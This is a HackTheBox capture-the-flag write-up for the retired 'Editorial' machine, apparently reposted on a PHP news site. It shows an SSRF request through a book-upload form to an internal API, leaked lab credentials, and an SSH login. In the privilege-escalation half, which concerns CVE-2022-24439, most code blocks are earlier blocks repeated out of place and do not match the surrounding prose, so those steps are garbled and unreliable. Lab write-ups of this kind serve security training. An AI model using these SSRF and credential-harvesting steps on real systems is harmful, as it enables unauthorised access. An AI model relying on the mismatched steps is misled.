HackTheBox - Writeup Editorial [Retired]

In this writeup we will explore an easy Linux machine called Editorial. This machine exploits the following vulnerabilities and exploitation techniques:

• Server-side request forgery (SSRF)
• Information Leaked
• Git hacktricks
• CVE-2022-24439 - Remote Code Execution (RCE)

Recon and user flag

Let's start by scanning our target to look for open ports using nmap:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/boardlight]
└─# nmap -sS --open -Pn 10.129.115.37
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-15 15:06 EDT
Nmap scan report for 10.129.115.37 (10.129.115.37)
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

We have port 22 running ssh and port 80 running an http server.
Accessing port 80 through IP we are redirected to editorial.htb, let's add this host to our /etc/hosts.

With this we can access the following content:

The website is a book publisher. Among the available options we find the following page:

Here we can send books to the publisher. Sending can be done in two ways, uploading a file locally or via a url.

When sending a file we are redirected to an endpoint similar to this:

• http://editorial.htb/static/uploads/0483497c-293d-44a4-87af-46a85f20cb60 Accessing the url downloads the file that we previously sent in PDF form.

Analyzing both options we found a SSRF when providing a local url, sending the following url as payload: http://127.0.0.1:5000

With this we download the file and we have the following content in json format:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/editorial]
└─# jq . requests-result/0483497c-293d-44a4-87af-46a85f20cb60
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

Here we have several endpoints that we can explore, for this we will use burp suite (which is already running in the background) to make new requests.
Let's initially focus on the endpoint /api/latest/metadata/messages/authors which has the following function: Retrieve the welcome message sent to our new authors

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------346249403126403154753644150452
Content-Length: 401
Origin: http://editorial.htb
Connection: close
Referer: http://editorial.htb/upload

-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/api/latest/metadata/messages/authors
-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------346249403126403154753644150452--

With this we have the following return:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Jun 2024 11:53:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 51

static/uploads/413c49ad-8adb-4bbb-9579-8a13e870ff5f

Now let's perform a get request for this endpoint:

GET /static/uploads/413c49ad-8adb-4bbb-9579-8a13e870ff5f HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://editorial.htb/upload

And so we have the following return:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Jun 2024 11:53:42 GMT
Content-Type: application/octet-stream
Content-Length: 506
Connection: close
Content-Disposition: inline; filename=413c49ad-8adb-4bbb-9579-8a13e870ff5f
Last-Modified: Sat, 22 Jun 2024 11:53:31 GMT
Cache-Control: no-cache
ETag: "1719057211.219647-506-4209449183"

{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}

We again have a return in json format. Here we have a welcome message for new authors and also a username and password:
Username: dev
Password: dev080217_devAPI!@

With this username and password we can access ssh to our target:

┌──(root㉿kali)-[/home/kali]
└─# ssh dev@editorial.htb
The authenticity of host 'editorial.htb (10.129.101.138)' can't be established.
ED25519 key fingerprint is SHA256:YR+ibhVYSWNLe4xyiPA0g45F4p1pNAcQ7+xupfIR70Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'editorial.htb' (ED25519) to the list of known hosts.
dev@editorial.htb's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Jun 22 11:54:05 AM UTC 2024

  System load:           0.0
  Usage of /:            60.4% of 6.35GB
  Memory usage:          12%
  Swap usage:            0%
  Processes:             225
  Users logged in:       0
  IPv4 address for eth0: 10.129.101.138
  IPv6 address for eth0: dead:beef::250:56ff:feb0:6c4b


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Jun 10 09:11:03 2024 from 10.10.14.52
dev@editorial:~$ 

And with this user we got the user flag!

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/boardlight]
└─# nmap -sS --open -Pn 10.129.115.37
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-15 15:06 EDT
Nmap scan report for 10.129.115.37 (10.129.115.37)
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Privilege escalation and root flag

In the user's home directory dev we have a directory called apps. Accessing this directory we have the following content:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/editorial]
└─# jq . requests-result/0483497c-293d-44a4-87af-46a85f20cb60
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

There is only one directory called .git. The .git directory records all changes to a project, recording the entire history of the project.
With this we can view the commit history:

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------346249403126403154753644150452
Content-Length: 401
Origin: http://editorial.htb
Connection: close
Referer: http://editorial.htb/upload

-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/api/latest/metadata/messages/authors
-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------346249403126403154753644150452--

Among the commits there is the following:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Jun 2024 11:53:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 51

static/uploads/413c49ad-8adb-4bbb-9579-8a13e870ff5f

Data from production to development was downgraded, here we can find important information.
To view the content of this commit, we will use the command git revert, which will revert the changes and return the project to this commit:

GET /static/uploads/413c49ad-8adb-4bbb-9579-8a13e870ff5f HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://editorial.htb/upload

We have a file called app.py, let's view its contents:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Jun 2024 11:53:42 GMT
Content-Type: application/octet-stream
Content-Length: 506
Connection: close
Content-Disposition: inline; filename=413c49ad-8adb-4bbb-9579-8a13e870ff5f
Last-Modified: Sat, 22 Jun 2024 11:53:31 GMT
Cache-Control: no-cache
ETag: "1719057211.219647-506-4209449183"

{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}

Here we have endpoints similar to what we found via SSRF initially. The difference is that the access data belongs to another user:

Username: prod
Password: 080217_Producti0n_2023!@

Viewing the users that we have in our target and that have an active shell, we have the following users:

┌──(root㉿kali)-[/home/kali]
└─# ssh dev@editorial.htb
The authenticity of host 'editorial.htb (10.129.101.138)' can't be established.
ED25519 key fingerprint is SHA256:YR+ibhVYSWNLe4xyiPA0g45F4p1pNAcQ7+xupfIR70Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'editorial.htb' (ED25519) to the list of known hosts.
dev@editorial.htb's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Jun 22 11:54:05 AM UTC 2024

  System load:           0.0
  Usage of /:            60.4% of 6.35GB
  Memory usage:          12%
  Swap usage:            0%
  Processes:             225
  Users logged in:       0
  IPv4 address for eth0: 10.129.101.138
  IPv6 address for eth0: dead:beef::250:56ff:feb0:6c4b


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Jun 10 09:11:03 2024 from 10.10.14.52
dev@editorial:~$ 

There is a user called prod. We can use this new password to use this user:

dev@editorial:~$ ls -a
.  ..  apps  .bash_history  .bash_logout  .bashrc  .cache  .profile  user.txt
dev@editorial:~$ cat user.txt
389072ccb7be77e63a1590defe01750e

With the new user we can see that we can run a python script with sudo, which grants us root permissions:

dev@editorial:~/apps$ ls -alh
total 12K
drwxrwxr-x 3 dev dev 4.0K Jun  5 14:36 .
drwxr-x--- 4 dev dev 4.0K Jun  5 14:36 ..
drwxr-xr-x 8 dev dev 4.0K Jun  5 14:36 .git

The command is to execute a python script that accepts any parameter, due to the asterisk *.
We can preview the content of the script to see what we were able to execute:

dev@editorial:~/apps$ git log
commit 8ad0f3187e2bda88bba85074635ea942974587e8 (HEAD -> master)
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 21:04:21 2023 -0500

    fix: bugfix in api port endpoint

commit dfef9f20e57d730b7d71967582035925d57ad883
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 21:01:11 2023 -0500

    change: remove debug and update api port

commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:55:08 2023 -0500

    change(api): downgrading prod to dev

    * To use development environment.

commit 1e84a036b2f33c59e2390730699a488c65643d28
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:51:10 2023 -0500

    feat: create api to editorial info

    * It (will) contains internal info about the editorial, this enable
       faster access to information.

commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:48:43 2023 -0500

    feat: create editorial app

    * This contains the base of this project.
    * Also we add a feature to enable to external authors send us their
       books and validate a future post in our editorial.

We do not have permissions to edit the file, only execute. The script uses Python os and sys libraries, which allows you to perform actions on Linux.
The script accepts a parameter, for this the Python lib sys is used.
A directory change is made to /opt/internal_apps/clone_changes using the function chdir from the python lib os.

Now using another python lib called git a git init is created, which initializes a repository.
The parameter that is accepted by the script must be a repository, so that a git clone can be made using this same git lib.

We can search for vulnerabilities in this lib, for this we will need to get the version through pip, which is a python package manager:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/boardlight]
└─# nmap -sS --open -Pn 10.129.115.37
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-15 15:06 EDT
Nmap scan report for 10.129.115.37 (10.129.115.37)
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Searching for vulnerabilities we found CVE-2022-24439, which is a Remote Code Execution due to inadequate validation of user input.
This vulnerability was reported by Snyk, which also made a PoC available.

We can change the poc to read files as root or elevate our access to root.

To read files we can execute the following command:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/editorial]
└─# jq . requests-result/0483497c-293d-44a4-87af-46a85f20cb60
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

And so we can read the root flag.

We can also add the sticky bit in the file /bin/bash, this way we can gain a shell as root. The sticky bit allows other users to use the file or binary with permissions from the file owner, in this case the root user. Adding to /bin/bash we get a shell as root:

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------346249403126403154753644150452
Content-Length: 401
Origin: http://editorial.htb
Connection: close
Referer: http://editorial.htb/upload

-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/api/latest/metadata/messages/authors
-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------346249403126403154753644150452--

And so we finish the Editorial machine!

The above is the detailed content of HackTheBox - Writeup Editorial [Retired]. For more information, please follow other related articles on the PHP Chinese website!